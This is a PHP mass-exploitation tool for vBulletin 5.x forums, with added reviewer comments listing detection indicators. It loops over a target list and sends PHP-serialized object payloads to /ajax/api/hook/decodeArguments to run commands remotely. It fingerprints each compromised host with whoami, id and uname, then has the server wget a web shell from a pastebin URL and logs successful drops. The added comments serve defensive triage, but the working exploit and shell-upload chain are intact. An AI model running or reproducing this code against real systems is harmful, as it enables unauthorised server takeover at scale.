vbulletin 5.x Rce upload shell Mass exploiting[PHP]
<?php
// Reviewer summary (defender's reading of this listing):
// Command-line script that walks a list of base URLs and, for each one, sends
// crafted GET requests to the vBulletin 5.x path
// /ajax/api/hook/decodeArguments with a PHP-serialized object in the
// "arguments" query parameter (see check(), inf() and shell() below).
// Artifacts visible in this file that are useful for detection and triage:
//   - request path /ajax/api/hook/decodeArguments with "arguments=O:12:" in the query
//   - fixed User-Agent "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
//   - marker string "magnom" and a dropped file named magnom.php
//   - an outbound wget from the forum host to pastebin.com
// Mitigation is the vendor's fix for the affected 5.x releases; the version
// range is not stated on this page, so confirm it against the vendor advisory.

// Silence all PHP diagnostics and remove the execution time limit so a long
// target list runs to completion without visible errors.
error_reporting(0);
set_time_limit(0);
print "
____ _ _ _ _ _____
| _ \ | | | | | (_) | __ \
__ _| |_) |_ _| | | ___| |_ _ _ __ | |__) |___ ___
\ \ / / _ <| | | | | |/ _ \ __| | '_ \ | _ // __/ _ \
\ V /| |_) | |_| | | | __/ |_| | | | | | | \ \ (_| __/
\_/ |____/ \__,_|_|_|\___|\__|_|_| |_| |_| \_\___\___| v.5.x
Tool coded by Mr.MaGnoM => Magsec.blogspot.com
The hacker make tool not tool make hacker (dont change rights)
usage php script.php list.txt => greetz all my friends :)
";
// if u change any Character in tool will not wrok :) dont change any think and shell link is : http://pastebin.com/raw.php?i=jxWrCM4B
// shells uploaded will save in results.txt only shells
// and i want say is hard to upload sheel cause of permission 99% of site u cant upload shell but try with ur chance
// for contact me : https://www.facebook.com/mr.magnom2
//echo "\n\t"."usage : php $argv[0] list.txt"."\n\n";
// NOTE(review): the author's comment above says results.txt, but the code
// below opens results.html; the latter is what actually gets written.
// NOTE(review): the author's own remark about permissions is the relevant
// hardening point: a web root that the PHP user cannot write to stops the
// file-drop step in shell(), though not the command execution itself.

// Load the whole target list named by the first CLI argument and split it on
// CRLF. There is no check that the argument was supplied or the file read.
$m=file_get_contents($argv[1]);
$e=explode("\r\n",$m);
// Shared append-mode handle used by shell() (via `global $open`) to log hits.
$open=fopen("results.html","a+");
// One check() call per list entry; check() chains into inf() and shell()
// when its probe matches.
foreach ($e as $link){
echo "\n [+] Scanning ==> ".$link."\n";
check($link);
}
// inf($ur): host-fingerprinting request. Called from check() after a positive
// probe. Sends one GET to $ur + /ajax/api/hook/decodeArguments and prints four
// fields parsed from the response body. Returns nothing.
//
// The "arguments" value is a PHP-serialized vB_dB_Result object whose nested
// vB_Database has functions['free_result'] set to "system" and whose recordset
// holds the command string. Presumably the endpoint unserializes this and the
// object's cleanup path calls free_result on the recordset; that server-side
// behaviour is not shown in this file.
// Command string carried here: whoami, id, uname -a and pwd, each followed by
// an echo of the ":::" separator.
//
// Detection: web/WAF logs showing this path with a serialized object
// ("O:12:" ... "vB_dB_Result") in the query string; process telemetry showing
// the web server's PHP process spawning whoami/id/uname.
function inf($ur){
$expt2='/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:50:"whoami;echo%20:::;id;echo%20:::;uname%20-a;echo%20:::;pwd;";}';
//$urlsk="$url/ajax/api/hook/decodeArguments?";
$urls2=($ur).($expt2);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$urls2");
// Static User-Agent imitating the MSN crawler; a request carrying this UA from
// an address outside Microsoft's crawler ranges is a usable log indicator.
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
// TLS peer verification is switched off, so any certificate is accepted.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
// Return the body as a string instead of printing it, and follow redirects.
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
// Split the body on the ":::" + newline markers emitted between commands.
// Indexes 0-3 are read without checking how many parts came back.
$sd=explode(":::\n",$data);
echo "\t [+] whoami :$sd[0]";
echo "\t [+] id :$sd[1]";
echo "\t [+] uname :$sd[2]";
echo "\t [+] pwd :$sd[3]";
}
// shell($url): file-drop step. Called from check() after a positive probe.
// Sends one GET carrying the same serialized-object structure as check() and
// inf(), with a command string that has the target run wget against a
// pastebin.com raw URL and save the result as magnom.php in the process's
// working directory. It then requests $url/magnom.php and, if the body
// contains "magnom", logs the URL to the shared results.html handle.
// Returns nothing.
//
// Detection and containment points for defenders:
//   - a file named magnom.php appearing in the forum's web root
//   - the web server's PHP process spawning wget
//   - outbound HTTP from the forum host to pastebin.com
//   - later requests to /magnom.php, including with the query "?mr=magnom"
// Blocking outbound traffic from the web tier and keeping the web root
// non-writable for the PHP user both interrupt this step.
function shell($url){
// Uses the results.html handle opened at script level.
global $open;
$expt='/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:57:"wget%20http://pastebin.com/raw.php?i=jxWrCM4B%20-O%20magnom.php";}';
//$urlsk="$url/ajax/api/hook/decodeArguments?";
$urls=($url).($expt);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$urls");
// Same fixed crawler-imitating User-Agent as the other requests in this file.
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
// TLS peer verification is switched off, so any certificate is accepted.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
// The response body is stored but never inspected; success is judged only by
// the follow-up fetch below.
$data = curl_exec($ch);
curl_close($ch);
// Second request: fetch the expected drop location. Errors are suppressed
// with @, so a failed fetch simply falls through to the "Fail" branch.
$sf="$url/magnom.php";
$geg=@file_get_contents($sf);
// Case-insensitive search for the marker string in the fetched body.
if(eregi("magnom",$geg)){
// Console line plus one HTML line appended to results.html per hit.
echo "\t [+] Upload Shell Method : Success => $url/magnom.php \n";fwrite($open,"$url/magnom.php?mr=magnom<br>");
}else{
echo "\t [+] Shell : Fail Cant bypass permession \n";
}
}
// check($url): probe step, called once per list entry from the main loop.
// Sends one GET to $url + /ajax/api/hook/decodeArguments with a URL-encoded
// serialized vB_dB_Result object whose command string is "echo magnom".
// If the marker comes back in a short response, the target is reported as
// vulnerable and inf() and shell() are run against it. Returns nothing.
//
// Detection: this is the first request of the sequence, so it is the earliest
// log entry to alert on: the decodeArguments path with "arguments=O:12:" and
// %22-encoded quotes in the query string, sent with the msnbot User-Agent.
function check($url){
$expt='/ajax/api/hook/decodeArguments?arguments=O:12:%22vB_dB_Result%22:2:{s:5:%22%00*%00db%22;O:11:%22vB_Database%22:1:{s:9:%22functions%22;a:1:{s:11:%22free_result%22;s:6:%22system%22;}}s:12:%22%00*%00recordset%22;s:11:%22echo%20magnom%22;}';
//$urlsk="$url/ajax/api/hook/decodeArguments?";
$urls=($url).($expt);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$urls");
// Same fixed crawler-imitating User-Agent as the other requests in this file.
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
// TLS peer verification is switched off, so any certificate is accepted.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
/*
echo "\n";
print $data;
echo "\n";
*/
// Positive only when the marker is present AND the body is under 50 bytes.
// Presumably the length bound is there to reject full HTML pages that merely
// reflect the marker; the file does not say so.
if (preg_match("#magnom#",$data) and strlen($data)<50){
echo "\t[+] Vul : yes \n";
// Follow-up requests: host fingerprinting, then the file-drop attempt.
inf($url);
shell($url);
}else{
echo "\t[+] Vul : No \n";
}
}
// Close the shared results.html handle; this statement runs after the
// per-target loop earlier in the script has finished.
fclose($open);
?>